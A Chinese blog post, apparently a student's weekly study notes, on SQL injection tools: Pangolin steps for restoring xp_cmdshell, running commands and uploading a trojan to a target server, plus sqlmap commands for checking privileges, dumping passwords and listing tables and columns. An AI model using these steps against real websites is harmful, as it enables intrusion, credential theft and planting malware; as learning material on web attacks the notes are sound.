大一第二学期周报7Web基础

最新推荐文章于 2022-01-26 19:14:03 发布
最新推荐文章于 2022-01-26 19:14:03 发布
阅读量188 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firm_people/article/details/105325715
版权

工具

一·GetWebSell增强版 TOOLs.Net
注入地址:(注入点)
备份路径:(网站根目录)
在这里插入图片描述

二·穿山甲
URL:(注入点)

跑完注入点后

Select allGo

获取注入点信息

我们可以
获取数据→获取表→获取列→读数据

再按
命令 恢复xp_cmdshell 执行

命令:
net user whoami

然后按
写文件,如下图所示
在这里插入图片描述

在这里插入图片描述

下面的选项中有一个文件管理,其作用是列磁盘和列目录

下载
把我们的木马下到它的某一个路径下,下好后去命令运行。

在这里插入图片描述

在这里插入图片描述

三·sql map
cmd中
sqlmap.py -u "注入点"
在这里插入图片描述

跑出来后,
cmd中
sqlmap.py -u “注入点” --is-dba
看权限

True的话是sa权限,见下图黄圈左边

在这里插入图片描述

sqlmap.py -u “注入点” --current-user
看当前用户名称

sqlmap.py -u “注入点” --privileges
看权限

sqlmap.py -u “注入点” --password
报密码

sqlmap.py -u “注入点” --current-db
看看当前是哪个数据库

如果是test数据库

sqlmap.py -u “注入点” --tables -D test(数据库名) --couent
看test数据库每个表里有多少列

sqlmap.py -u “注入点” --columns -T admin -D test
看test数据库的admin表里有多少数据

千言不如杯烈酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
大一第二学期周报3Web基础
firm_people的博客
03-08 408
漏洞分析 一·NMAP端口扫描之王 功能: 1.主机探测 扫描单个主机 nmap + 192.168.1.140(ip) 扫描整个子网 nmap + 192.168.1.140/24 /8 A类 /16 B类 /24 C类 扫描多个目标 nmap + ip + ip 扫描一个范围内的目标 nmap 192.168.1.1-100(1到100) 如果有IP地址...
第7周周报1
08-08
周报主要总结了网上人才招聘系统项目的第七周的工作进度和完成情况。项目的主要任务是对整个系统进行测试、检查和核实,以确保系统是否满足用户的设计需求和需求规格说明书。 知识点1:项目管理 在项目管理中,...
大一寒假周报1
firm_people的博客
01-18 370
一·C语言算法代码练习 洛谷: 1.津津储蓄计划 #include<stdio.h> int main(void) { int i,money=0,savings=0,saving=0,Estimate=0; for(i=1;i<=12;i++) { money = money + 300; scanf("%d",&Estimate); saving =...
大一第二学期周报1Web基础
firm_people的博客
03-01 363
虚拟机 一·虚拟机创建 1.虚拟机安装软件,如VMware。 2.所需ISO镜像软件。 二·作用 对我来说,我安装的虚拟机的作用是模拟练习网络攻击。 后面会经行一些描述。 HTTP 一·http响应码 200:成功 302:重定向 404:资源不存在 400:客户端请求有语法错误 401:请求未经授权 403:服务器收到请求,但是拒绝服务 500:服务器内部错误 503:服务器当前不能处理客户端...
大一第二学期周报2Web基础
firm_people的博客
03-01 503
网络基础知识 写一下复习一遍,其它太文字的概念就不打了 公网地址只能和公网相通 IP地址有网络位和主机位 网络位不可变,主机位可变 重要的地方: 路由器 路由表,后面的数字越高,优先级越高 交换机 arp协议 重点:局域网传输依靠MAC地址 这里涉及到arp欺骗的知识 怎么防御这种arp欺骗呢 方法: 双向MAC地址绑定 具体做法为在cmd中输入 arp -s ip MAC地址 静态绑定 ip与...
大一寒假周报(二)--淘宝页面制作与表单复习
qq_61662856的博客
01-26 907
基本结构样式 结构划分(可以按照颜色尺寸来划分) -头部信息 -广告区 -搜索区 -主卖场 -侧边栏等特殊区域(最好使用id选择器) 准备样式表 -准备重置样式表 -自己的样式表 头部信息样式 标题 使用标题来实现 小图标 -格式:.ico 可以在网页上制作,注意要放在网页的根目录中 <link rel="icon" href="favicon.ico"> 注意IE浏览器不能通过私有协议来打开图标 base标签 设置一个基础的url,或者是跳转。注意一个页面只能有一个base标签。 列表 子元
大一第二学期周报5Web基础
firm_people的博客
03-22 208
MsSQL注入 SQL Server sql server:学校,政府,oa,游戏等。 脚本:asp,aspx 一·MsSQL服务、端口、后缀 重启服务使其生效 命令:services.msc TCP:0.0.0.0:1433 1433端口是开启的,当关闭服务后,端口也关闭 后缀 cracer.mdf 数据库文件 cracer_log.ldf 数据库日志文件 爆破1433可以用hydra工具。 ...
化工周报-7月第2周.pdf
08-21
化工周报-7月第2周.pdf
第二学期北师大版一年级数学课课练及答案全册7精选.doc
09-26
这篇文档是针对小学一年级第二学期北师大版数学课程的课后练习及答案,涵盖了基础的数学概念和运算。以下是对这些练习题目的详细解析: 1、完成表格:这是一个简单的填空题,可能是让学生填写数字或者进行简单的...
十月第二周报.pdf
10-15
十月第二周报周报中主要涉及到 Vue.js 框架的使用,包括过滤器、v-else 指令和计算属性 computed 等知识点。 一、过滤器 过滤器是 Vue.js 中的一种功能,它可以对数据进行格式化和处理。在本周报中,我们...
安全周报-2010年7月第2期.rar
07-09
本次发布的是《安全周报第二期。  《安全周报》现暂定为开放式免费阅读,欢迎广大读者提出宝贵意见,回复意见邮箱:secdoctor007@163.com  请您通过登陆中国信息安全博士网(www.secdoctor.com),下载《安全...
机器学习模型评估与优化:常用方法与实践技巧.md
08-15
机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器
强化学习算法介绍.docx
08-15
强化学习
SpringBoot+Vue在线商城(电子商城)系统 java毕业设计 源码+sql脚本+论文 完整版
08-15
这个是完整源码 SpringBoot + Vue实现 SpringBoot+Vue在线商城(电子商城)系统 java毕业设计 源码+sql脚本+论文 完整版 数据库是mysql 随着互联网技术的发展和普及,电子商务在全球范围内得到了迅猛的发展,已经成为了一种重要的商业模式和生活方式。电子商城是电子商务的重要组成部分,是一个基于互联网的商业模式和交易平台,通过网络进行产品和服务的销售。电子商城已成为了线上交易和消费的主要方式,人们可以方便快捷地买到自己想要的商品和服务,并在家中享受线上购物的便利性和舒适性。 基于这个背景,我们决定开发一个功能强大、易于使用、可靠性高的商城系统,以满足用户在线购物的需求。这个商城系统将支持多种商品和服务的销售、多种支付方式和多种物流配送方式,提供优惠券和积分等扩展功能,为用户提供舒适的购物体验和服务。同时,我们还将采用最新的技术和开发模式,在保证系统稳定运行的同时,不断推出新的功能和特性,以满足用户不断增长的需求和期望。基于这个背景,我们决定开发一个功能强大、易于使用、可靠性高的商城系统,以满足用户在线购物的需求。这个商城系统将支持多种商品和服务的销售、多
【无人机控制】基于matlab模型预测控制和反馈线性化控制系统的四旋翼无人机【含Matlab源码 7228期】.mp4
08-15
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
“人力资源+大数据+薪酬报告+涨薪调薪”
08-15
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
烟火数据集烟火数据集烟火数据集
最新发布
08-15
烟火数据集烟火数据集烟火数据集
基于SSM++jsp的会员管理系统
08-15
内容概要 本会员管理系统基于SSM(Spring、Spring MVC、MyBatis)框架和JSP技术开发,专为企业和机构提供会员信息的高效管理解决方案。系统包含会员信息录入、等级管理、积分管理、活动记录、消费统计等多项功能模块,通过简洁易用的界面实现会员信息的集中化管理。系统支持对会员的动态跟踪和分析,帮助企业更好地了解会员行为和需求,优化会员服务。同时,系统具备良好的可扩展性和安全性,采用分层架构设计,方便后期的维护和功能拓展。 适用人群 本系统适用于各类企业、俱乐部、协会以及需要进行会员管理的机构,尤其是商场、健身房、美容院、教育机构等经常需要与会员保持紧密联系的行业。对于企业管理者来说,系统可以简化会员管理流程,提升运营效率。市场营销部门可以利用系统中的会员数据进行精准营销,提高活动效果。IT技术人员则可以根据具体需求,对系统进行二次开发,以满足企业的特殊要求。 使用场景及目标 该系统适用于多个使用场景,包括会员信息的初次录入与后续管理、会员积分的发放与兑换、会员等级的自动升级、活动邀请与参与记录,以及消费统计与分析等。系统的目标是通过数字化手段,实现会员信息的集中管理,
Java实习生周报:适应期挑战与基础语法强化
第二周的重点是深入学习Java基础语法,强调了类和对象的概念,如类之间的关系、数据类型的使用(如整数、浮点、字符、布尔类型)、逻辑语句和循环结构(如switch和break/continue的用法),以及访问权限控制(public...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

千言不如杯烈酒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值